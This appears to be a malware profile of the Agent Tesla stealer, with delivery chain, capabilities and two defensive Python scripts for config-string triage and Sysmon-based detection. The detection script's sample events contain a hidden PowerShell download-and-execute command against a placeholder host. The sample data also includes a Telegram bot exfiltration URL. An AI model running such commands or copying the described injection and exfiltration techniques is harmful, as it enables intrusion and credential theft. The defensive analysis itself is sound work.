Malware

Agent Tesla

Executive Summary

Agent Tesla is a .NET-based remote access trojan (RAT) and information stealer that has targeted Microsoft Windows systems since 2014. Its capabilities include credential theft, keystroke logging, clipboard monitoring and screenshot capture. It has received regular updates since its release and is sold as malware-as-a-service (MaaS) with several subscription tiers. Campaigns typically begin with phishing emails that masquerade as legitimate messages from trusted senders.



Overview

Description

Type: Information-stealing Remote Access Trojan (RAT) sold as Malware-as-a-Service (MaaS)

Delivery:
Primarily distributed through phishing campaigns using malicious attachments such as .zip / .rar archives, malicious Office documents with macros, .img / .iso disk images, and .exe, .js, .vbs, or .lnk droppers. The payload is often delivered through multi-stage loaders such as GuLoader, Snake Keylogger loaders, .NET downloaders, and PowerShell download chains. Attachments frequently impersonate invoices, purchase orders, shipping notices, or financial documents.

Capabilities:
Credential harvesting from web browsers (Chrome, Firefox, Edge, Opera), email credential theft from clients such as Outlook and Thunderbird, FTP credential extraction, keystroke logging, clipboard monitoring, screenshot capture, system reconnaissance (hostname, IP address, OS version), data exfiltration via SMTP, FTP, HTTP, or the Telegram Bot API, and persistence via registry Run keys or the Startup folder. Stolen data is transmitted periodically to attacker-controlled infrastructure.

Notable Characteristics:
Written in .NET, which makes it easy to modify and recompile. Widely sold on underground forums as a subscription-based MaaS tool. Often delivered through commodity malware loaders. Heavy use of string obfuscation, Base64 encoding, and packing. Frequent variant churn because different operators build their own payloads with the builder kit. Exfiltration frequently goes over SMTP or Telegram bots, so the traffic is addressed to ordinary mail servers or api.telegram.org rather than to a dedicated command-and-control host, which weakens detections that key on known C2 infrastructure.
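As an added illustration of the Base64 string obfuscation noted above (example code written for this page, not a tool from the Agent Tesla authors or from this site), the script below extracts ASCII and UTF-16LE string runs from a file image, decodes the runs that are well-formed Base64, and flags decoded values that look like an SMTP, FTP, Telegram or web-panel exfiltration endpoint. It assumes the simplest case, a single Base64 layer over UTF-8 text; builds that add XOR or AES on top need that layer removed first. The SAMPLE bytes are constructed for the example and are not a real binary.

```python
"""Static triage of Base64-wrapped configuration strings.

Agent Tesla builds keep their exfiltration settings (SMTP host and account,
Telegram bot URL, FTP server) as obfuscated strings, commonly Base64.  This
script pulls ASCII and UTF-16LE string runs out of a file image, decodes the
runs that are valid Base64, and reports decoded values that look like an
exfiltration endpoint.  SAMPLE is constructed for the example; it is not a
real Agent Tesla binary.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

MIN_LEN = 8
B64_RUN = re.compile(rb"^[A-Za-z0-9+/]{8,}={0,2}$")
INDICATORS = {
    "smtp": re.compile(r"^smtp\.|:(25|465|587)$", re.I),
    "telegram": re.compile(r"api\.telegram\.org/bot", re.I),
    "ftp": re.compile(r"^ftp://|^ftp\.", re.I),
    "webpanel": re.compile(r"^https?://.+\.php", re.I),
}


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> List[bytes]:
    """Return printable ASCII runs plus UTF-16LE runs (.NET user strings)."""
    ascii_runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    wide = re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)
    return ascii_runs + [w.replace(b"\x00", b"") for w in wide]


def decode_if_b64(run: bytes) -> Optional[str]:
    """Decode a run only if it is well-formed Base64 yielding printable text."""
    if len(run) % 4 or not B64_RUN.match(run):
        return None
    try:
        text = base64.b64decode(run, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def triage(data: bytes) -> Dict[str, List[str]]:
    """Map each indicator class to the decoded strings that matched it."""
    hits: Dict[str, List[str]] = {name: [] for name in INDICATORS}
    for run in extract_strings(data):
        decoded = decode_if_b64(run)
        if decoded is None:
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(decoded) and decoded not in hits[name]:
                hits[name].append(decoded)
    return hits


def _b64(s: str) -> bytes:
    return base64.b64encode(s.encode())


# Constructed sample: PE-like header, a plain string, one ASCII Base64 config
# value, one UTF-16LE Base64 value, a harmless Base64 string and binary noise.
_TG = "https://api.telegram.org/bot123456:ABCDEF/sendDocument"
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 8
    + b"RegAsm.exe" + b"\x00\x00"
    + _b64("smtp.example-mail.test:587") + b"\x00\x00"
    + _b64(_TG).decode().encode("utf-16-le") + b"\x00\x00"
    + _b64("Hello, World") + b"\x00\x00"
    + b"\xde\xad\xbe\xef" * 4
)

if __name__ == "__main__":
    for name, values in triage(SAMPLE).items():
        print(f"{name:9s} {values}")
```

Running it against a real sample means reading the file bytes into `triage`; decoded credentials found this way are the same ones the malware will use, so they should be reported to the mail provider or Telegram as abused accounts rather than stored in the case notes in clear text.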



Attack Flow

Flow
Phishing Email → Word Attachment → Embedded RTF / Excel Object → Macro Execution → PowerShell Download → .NET Loader → Process Injection (RegSvcs.exe / RegAsm.exe) → Agent Tesla Execution → Credential Harvesting → SMTP / HTTP Exfiltration
  • Victim receives an email impersonating invoices, shipping notices, or purchase orders
  • Email contains a Word document or archive containing the malicious file
  • Document loads an embedded RTF or Excel object that triggers macro execution
  • Macro launches PowerShell to retrieve a remote payload
  • A loader stage (GuLoader, a .NET downloader, or similar) retrieves and decrypts the Agent Tesla payload in memory
  • The loader injects the decrypted payload into a legitimate, Microsoft-signed .NET Framework utility such as RegSvcs.exe or RegAsm.exe, so the stealer runs under a trusted image name
  • Malware begins credential harvesting and system reconnaissance
  • Stolen credentials and system data are transmitted to attacker infrastructure via SMTP, FTP, HTTP, or Telegram APIs
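The chain above maps onto a small set of endpoint telemetry checks. The following is an added example for this page, not a rule shipped by the site or by any vendor: it runs over Sysmon-style events (EventID 1 process create, 3 network connect, 13 registry value set; the field names follow Sysmon's, which is an assumption about the log source) and flags an Office application spawning a script host, RegSvcs.exe or RegAsm.exe started without arguments by something other than a build tool or installer, that utility opening an SMTP or FTP port or reaching api.telegram.org, and a Run key written by the chain. Alerts are grouped by process tree so that one tree hitting several checks is reported as a likely infection rather than four unrelated leads. The events are constructed for the example.

```python
"""Detection logic for the Agent Tesla delivery chain over Sysmon-style events.

Event shapes follow Sysmon field names (assumed log source).  SAMPLE_EVENTS is
constructed for this example and is not real telemetry.
"""
from collections import defaultdict
from typing import Dict, List

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
DOTNET_UTILS = {"regsvcs.exe", "regasm.exe"}
# Parents that legitimately launch RegAsm/RegSvcs: build tools and installers.
BUILD_PARENTS = {"msbuild.exe", "devenv.exe", "msiexec.exe", "installutil.exe"}
EXFIL_PORTS = {21, 25, 465, 587}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_args(cmdline: str) -> bool:
    # Drop quotes and count tokens: a bare "<path>\RegAsm.exe" is one token,
    # while legitimate use always passes an assembly path or a switch.
    return len(cmdline.replace('"', "").split()) > 1


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def analyze(events: List[dict]) -> Dict:
    alerts: List[Dict] = []
    parent_of: Dict[int, int] = {}

    def alert(rule: str, ev: dict) -> None:
        alerts.append({"rule": rule, "pid": ev["ProcessId"], "image": ev["Image"]})

    for ev in events:
        img = basename(ev["Image"])
        if ev["EventID"] == 1:
            parent_of[ev["ProcessId"]] = ev["ParentProcessId"]
            parent = basename(ev["ParentImage"])
            if parent in OFFICE and img in SCRIPT_HOSTS:
                alert("office_spawns_script_host", ev)
            if (img in DOTNET_UTILS and parent not in BUILD_PARENTS
                    and not has_args(ev["CommandLine"])):
                alert("dotnet_utility_without_args", ev)
        elif ev["EventID"] == 3:
            host = ev.get("DestinationHostname", "").lower()
            if img in DOTNET_UTILS and (ev["DestinationPort"] in EXFIL_PORTS
                                        or host.endswith("api.telegram.org")):
                alert("exfil_from_dotnet_utility", ev)
        elif ev["EventID"] == 13:
            if ("\\currentversion\\run\\" in ev["TargetObject"].lower()
                    and (img in DOTNET_UTILS | SCRIPT_HOSTS
                         or in_user_writable(ev["Image"]))):
                alert("run_key_persistence", ev)

    def root(pid: int) -> int:  # walk up to the highest ancestor we saw
        while pid in parent_of:
            pid = parent_of[pid]
        return pid

    trees: Dict[int, Dict] = defaultdict(lambda: {"rules": set(), "pids": set()})
    for a in alerts:
        tree = trees[root(a["pid"])]
        tree["rules"].add(a["rule"])
        tree["pids"].add(a["pid"])
    for tree in trees.values():
        tree["verdict"] = "likely_infection" if len(tree["rules"]) >= 2 else "lead"
    return {"alerts": alerts, "trees": dict(trees)}


def _proc(pid, ppid, image, parent, cmd):
    return {"EventID": 1, "ProcessId": pid, "ParentProcessId": ppid,
            "Image": image, "ParentImage": parent, "CommandLine": cmd}


NET = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\"
WORD = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
LDR = "C:\\Users\\u\\AppData\\Local\\Temp\\ldr.exe"
SAMPLE_EVENTS = [  # constructed for this example
    _proc(1200, 1000, WORD, "C:\\Windows\\explorer.exe",
          '"WINWORD.EXE" /n "C:\\Users\\u\\Downloads\\Invoice_4471.docx"'),
    _proc(1300, 1200, PS, WORD, "powershell.exe -nop -w hidden -ep bypass -c "
          '"iwr http://loader.example.invalid/s.ps1 | iex"'),
    _proc(1400, 1300, LDR, PS, LDR),
    _proc(1500, 1400, NET + "RegAsm.exe", LDR, '"' + NET + 'RegAsm.exe"'),
    {"EventID": 3, "ProcessId": 1500, "Image": NET + "RegAsm.exe",
     "DestinationHostname": "smtp.mail.example.invalid", "DestinationPort": 587},
    {"EventID": 13, "ProcessId": 1500, "Image": NET + "RegAsm.exe",
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    # Benign: build tool registering a COM assembly, with arguments.
    _proc(2100, 2000, NET + "RegAsm.exe", "C:\\Program Files\\MSBuild\\MSBuild.exe",
          NET + "RegAsm.exe /codebase MyLib.dll"),
    # Benign: mail client using the SMTP submission port.
    {"EventID": 3, "ProcessId": 3000, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
     "DestinationHostname": "mail.corp.example", "DestinationPort": 587},
]

if __name__ == "__main__":
    for root_pid, tree in analyze(SAMPLE_EVENTS)["trees"].items():
        print(root_pid, tree["verdict"], sorted(tree["rules"]))
```

The argument check on RegAsm.exe and RegSvcs.exe is the cheapest of the four: a hollowed host is started with nothing but its own path, whereas every legitimate invocation names an assembly. The network check only fires for those two images, so a mail client on port 587 is left alone; widen `DOTNET_UTILS` if a variant is seen hollowing a different host.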


MITRE ATT&CK Techniques



Detections

Detection Rules

Rules provided on the original page (view/download links not reproduced):
  • YARA
  • Suricata
  • SPL (Splunk)

Research & References

References
This post is licensed under CC BY 4.0 by the author.